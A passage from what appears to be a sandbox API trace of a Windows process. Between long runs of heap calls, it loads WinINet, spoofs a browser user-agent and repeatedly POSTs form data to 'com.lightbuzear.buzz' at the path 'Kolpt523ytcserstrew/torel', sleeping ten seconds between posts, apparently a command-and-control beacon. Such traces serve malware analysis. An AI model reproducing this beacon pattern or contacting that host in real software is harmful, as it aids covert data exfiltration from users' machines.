lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0250.303] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6d0 [0250.303] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0250.303] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0250.303] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0250.303] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6e0 [0250.303] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0250.303] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815c68 [0250.303] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0250.303] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815b90 [0250.303] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c68 | out: hHeap=0x4780000) returned 1 [0250.304] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0250.304] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815b90 | out: hHeap=0x4780000) returned 1 [0250.304] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800fc8 [0250.304] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0250.304] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbda0 [0250.304] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800fc8 | out: hHeap=0x4780000) returned 1 [0250.304] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800ff0 [0250.304] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0250.304] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800fa0 [0250.304] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0250.305] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbda0 | out: hHeap=0x4780000) returned 1 [0250.305] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0250.305] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0251.536] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800fa0 | out: hHeap=0x4780000) returned 1 [0251.536] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce640 [0251.536] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6e0 [0251.536] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0251.536] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0251.536] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce680 [0251.536] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0251.536] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0251.537] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0251.537] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0251.537] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0251.537] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5e0 [0251.537] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0251.537] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815c08 [0251.537] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0251.537] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815b18 [0251.537] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c08 | out: hHeap=0x4780000) returned 1 [0251.537] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0251.537] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815b18 | out: hHeap=0x4780000) returned 1 [0251.537] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800f78 [0251.537] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0251.537] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0251.537] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800f78 | out: hHeap=0x4780000) returned 1 [0251.537] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800fc8 [0251.537] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0251.537] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800f78 [0251.538] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0251.538] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0251.538] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0251.538] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0251.539] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800f78 | out: hHeap=0x4780000) returned 1 [0251.539] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0251.539] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6f0 [0251.539] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce610 [0251.539] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0251.539] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5f0 [0251.539] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0251.539] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5b0 [0251.539] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0251.539] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce730 [0251.539] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0251.539] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815c98 [0251.539] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0251.539] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815c50 [0251.539] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c98 | out: hHeap=0x4780000) returned 1 [0251.539] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0251.539] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c50 | out: hHeap=0x4780000) returned 1 [0251.539] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800fa0 [0251.539] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0251.539] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe48 [0251.539] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800fa0 | out: hHeap=0x4780000) returned 1 [0251.539] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800f78 [0251.540] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbf28 [0251.540] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4801018 [0251.540] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0251.540] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0251.541] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0251.541] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0251.541] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4801018 | out: hHeap=0x4780000) returned 1 [0251.541] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0251.541] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0251.548] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0251.548] FreeLibrary (hLibModule=0x71570000) returned 1 [0251.549] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0251.549] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0251.549] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800dc0 | out: hHeap=0x4780000) returned 1 [0251.549] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800c30 | out: hHeap=0x4780000) returned 1 [0251.550] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800f28 | out: hHeap=0x4780000) returned 1 [0251.550] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800bb8 | out: hHeap=0x4780000) returned 1 [0251.550] Sleep (dwMilliseconds=0x2710) [0251.582] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce620 [0251.582] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce670 [0251.582] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0251.582] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0251.582] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0251.582] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6b0 [0251.582] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0251.582] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5b0 [0251.582] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0251.582] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815938 [0251.582] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0251.582] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x48159c8 [0251.583] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815938 | out: hHeap=0x4780000) returned 1 [0251.583] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0251.583] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48159c8 | out: hHeap=0x4780000) returned 1 [0251.583] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815938 [0251.583] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800f28 [0251.583] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800f28 | out: hHeap=0x4780000) returned 1 [0251.583] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0251.583] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800f28 [0251.583] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0251.584] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6e0 [0251.584] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce670 [0251.584] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0251.584] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce680 [0251.584] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0251.584] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0251.584] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0251.584] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0251.584] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0251.584] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x48159c8 [0251.584] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0251.584] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x48159e0 [0251.584] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48159c8 | out: hHeap=0x4780000) returned 1 [0251.584] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0251.584] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48159e0 | out: hHeap=0x4780000) returned 1 [0251.584] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800dc0 [0251.584] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0251.584] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbd68 [0251.584] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800dc0 | out: hHeap=0x4780000) returned 1 [0251.584] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800bb8 [0251.584] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb908 [0251.584] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800dc0 [0251.585] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb908 | out: hHeap=0x4780000) returned 1 [0251.585] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd68 | out: hHeap=0x4780000) returned 1 [0251.585] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0251.585] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0251.585] FreeLibrary (hLibModule=0x71780000) returned 1 [0251.586] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800dc0 | out: hHeap=0x4780000) returned 1 [0251.586] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0251.586] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800dc0 [0251.586] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0251.586] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6e0 [0251.586] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6c0 [0251.586] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0251.586] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0251.586] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0251.586] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce680 [0251.586] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0251.586] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce600 [0251.586] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0251.586] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x48159c8 [0251.586] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0251.586] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x48159e0 [0251.586] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48159c8 | out: hHeap=0x4780000) returned 1 [0251.587] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0251.587] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48159e0 | out: hHeap=0x4780000) returned 1 [0251.587] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x48159c8 [0251.587] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800c30 [0251.587] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800c30 | out: hHeap=0x4780000) returned 1 [0251.587] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0251.587] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800c30 [0251.587] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0251.587] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4801018 [0251.587] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0251.587] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce740 [0251.587] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0251.587] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5b0 [0251.587] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0251.587] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0251.588] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0251.588] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5b0 [0251.588] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0251.588] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x48159e0 [0251.588] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0251.588] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815c38 [0251.588] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48159e0 | out: hHeap=0x4780000) returned 1 [0251.588] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0251.588] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c38 | out: hHeap=0x4780000) returned 1 [0251.588] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815b48 [0251.588] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800fa0 [0251.589] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800fa0 | out: hHeap=0x4780000) returned 1 [0251.597] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0251.597] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0251.598] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce630 [0251.598] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce640 [0251.598] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0251.598] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5b0 [0251.598] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0251.598] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6a0 [0251.598] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0251.598] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce570 [0251.598] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0251.598] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815c38 [0251.598] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0251.598] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815c50 [0251.598] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c38 | out: hHeap=0x4780000) returned 1 [0251.598] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0251.598] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c50 | out: hHeap=0x4780000) returned 1 [0251.598] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800fa0 [0251.598] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0251.598] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbf28 [0251.598] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800fa0 | out: hHeap=0x4780000) returned 1 [0251.598] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800fa0 [0251.598] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe48 [0251.598] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800230 [0251.599] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0251.599] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0251.600] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0251.600] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0251.600] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800230 | out: hHeap=0x4780000) returned 1 [0251.600] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0251.600] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6a0 [0251.601] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0251.601] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce570 [0251.601] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0251.601] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5e0 [0251.601] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0251.601] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0251.601] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0251.601] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815c80 [0251.601] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0251.601] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815c98 [0251.601] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c80 | out: hHeap=0x4780000) returned 1 [0251.601] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0251.601] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c98 | out: hHeap=0x4780000) returned 1 [0251.601] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48002a8 [0251.601] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0251.601] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe48 [0251.601] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48002a8 | out: hHeap=0x4780000) returned 1 [0251.601] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800500 [0251.601] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe80 [0251.602] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48003c0 [0251.602] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe80 | out: hHeap=0x4780000) returned 1 [0251.602] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0251.603] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0251.603] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0252.708] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48003c0 | out: 